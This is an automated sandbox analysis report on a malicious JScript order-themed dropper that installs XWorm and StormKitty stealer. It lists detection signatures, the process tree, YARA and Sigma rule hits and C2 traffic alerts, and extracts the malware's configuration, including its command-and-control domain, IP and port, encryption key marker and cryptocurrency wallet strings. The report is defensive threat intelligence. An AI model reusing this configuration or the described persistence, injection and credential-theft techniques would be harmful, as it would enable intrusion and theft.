Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER-24930-067548.js

Overview

General Information

Sample name:ORDER-24930-067548.js
Analysis ID:1523152
MD5:8fbf57ab035ec7063b9522e5f30a75f7
SHA1:cd761463221ba82f46b2b28fe56a0e74588c64b9
SHA256:ff84d777db298c70e206a94f1a4a1a5d5536d8cd42eedbd50ffde364daa368a6
Tags:AsyncRATjsRATuser-abuse_ch
Infos:

Detection

StormKitty, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BrowserPasswordDump
Yara detected StormKitty Stealer
Yara detected XWorm
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains functionality to disable the Task Manager (.Net Source)
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5672 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 3272 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • GeUT.exe (PID: 3120 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
        • GeUT.exe (PID: 3032 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • GeUT.exe (PID: 6884 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5664 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 3672 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5812 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 6960 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 6764 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • Service.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 2772 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 4620 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 4152 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 1280 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 3040 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • GeUT.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 3772 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5300 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 6148 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5252 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • GeUT.exe (PID: 5072 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • WMIADAP.exe (PID: 3772 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • Service.exe (PID: 5384 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 3184 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 1344 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 1656 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
    • Service.exe (PID: 6324 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x97ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x9889:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x999e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x8ff0:$cnc4: POST / HTTP/1.1
    00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x55d84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x60fc8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6c224:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x77b80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x55e21:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x61065:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x6c2c1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x77c1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x55f36:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x6117a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x6c3d6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x77d32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x55588:$cnc4: POST / HTTP/1.1
      • 0x607cc:$cnc4: POST / HTTP/1.1
      • 0x6ba28:$cnc4: POST / HTTP/1.1
      • 0x77384:$cnc4: POST / HTTP/1.1
      00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        13.2.Service.exe.2e1383c.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
          13.2.Service.exe.2e1383c.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x7bec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x7c89:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x7d9e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x73f0:$cnc4: POST / HTTP/1.1
          13.2.Service.exe.2dfd39c.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            13.2.Service.exe.2dfd39c.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x7bec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x7c89:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x7d9e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x73f0:$cnc4: POST / HTTP/1.1
            13.2.Service.exe.2e085e0.4.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 29 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\GeUT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\GeUT.exe, ProcessId: 3120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5672, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , ProcessId: 3272, ProcessName: wscript.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5672, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js" , ProcessId: 3272, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", ProcessId: 5672, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper - File
              Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5672, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].js
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\GeUT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\GeUT.exe, ProcessId: 3120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
              Sigma detected: Script Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.210.215.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5672, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49704
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js", ProcessId: 5672, ProcessName: wscript.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-01T07:38:25.156317+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:38:29.771402+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:38:33.846431+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:38:44.211472+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:38:54.515877+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:38:59.777922+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:04.844685+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:15.172918+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:25.500425+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:29.787232+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:30.844277+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:31.219064+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:41.547534+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:51.017560+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:51.484675+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:59.801507+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:01.328879+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:06.672378+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:06.740625+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:06.766574+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:06.817138+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:06.933771+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:08.127213+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:17.672423+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:17.769399+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:18.156773+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:23.297476+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:23.535255+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:40:25.226430+020028528701Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-01T07:38:33.878120+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:38:44.293513+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:38:54.517637+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:39:04.846337+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:39:15.176865+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:39:25.503142+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:39:30.846498+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:39:31.220824+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:39:41.549589+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:39:51.019271+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:39:51.486893+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:01.330625+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:06.674792+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:06.742455+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:06.768227+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:06.820034+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:06.937262+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:08.131437+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:17.677217+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:17.773189+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:18.158722+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:25.006132+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              2024-10-01T07:40:25.227115+020028529231Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-01T07:38:29.771402+020028528741Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:38:59.777922+020028528741Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:29.787232+020028528741Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              2024-10-01T07:39:59.801507+020028528741Malware Command and Control Activity Detected194.37.97.1506980192.168.2.849705TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-01T07:38:44.077679+020028559241Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-01T07:38:25.502240+020028531921Malware Command and Control Activity Detected192.168.2.849705194.37.97.1506980TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeAvira: detection malicious, Label: TR/Dropper.Gen
              Source: C:\Users\user\AppData\Local\Temp\OLWJMU.jsAvira: detection malicious, Label: JS/Dldr.G17
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].jsAvira: detection malicious, Label: JS/Dldr.G17
              Source: C:\Users\user\AppData\Roaming\Service.exeAvira: detection malicious, Label: TR/Dropper.Gen
              Found malware configuration
              Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}
              Multi AV Scanner detection for submitted file
              Source: ORDER-24930-067548.jsVirustotal: Detection: 30%Perma Link
              Source: ORDER-24930-067548.jsReversingLabs: Detection: 26%
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\Service.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 13.2.Service.exe.2e085e0.4.raw.unpackString decryptor: as525795.duckdns.org,194.37.97.150
              Source: 13.2.Service.exe.2e085e0.4.raw.unpackString decryptor: 6980
              Source: 13.2.Service.exe.2e085e0.4.raw.unpackString decryptor: <123456789>
              Source: 13.2.Service.exe.2e085e0.4.raw.unpackString decryptor: <Xwormmm>
              Source: 13.2.Service.exe.2e085e0.4.raw.unpackString decryptor: XWorm V5.3
              Source: 13.2.Service.exe.2e085e0.4.raw.unpackString decryptor: adobe.exe
              Source: 13.2.Service.exe.2e085e0.4.raw.unpackString decryptor: bc1q6ctx30m7yf3swhuskp3n34awjtnxw7974qewyh
              Source: 13.2.Service.exe.2e085e0.4.raw.unpackString decryptor: 0x344Bc250C2901d36f2FD4698632D289B9977BEd6
              Source: 13.2.Service.exe.2e085e0.4.raw.unpackString decryptor: BLMpkfcDYXR1q2bgbj2mBPk9uQsgAVc6vdv62zRuMAHN
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp
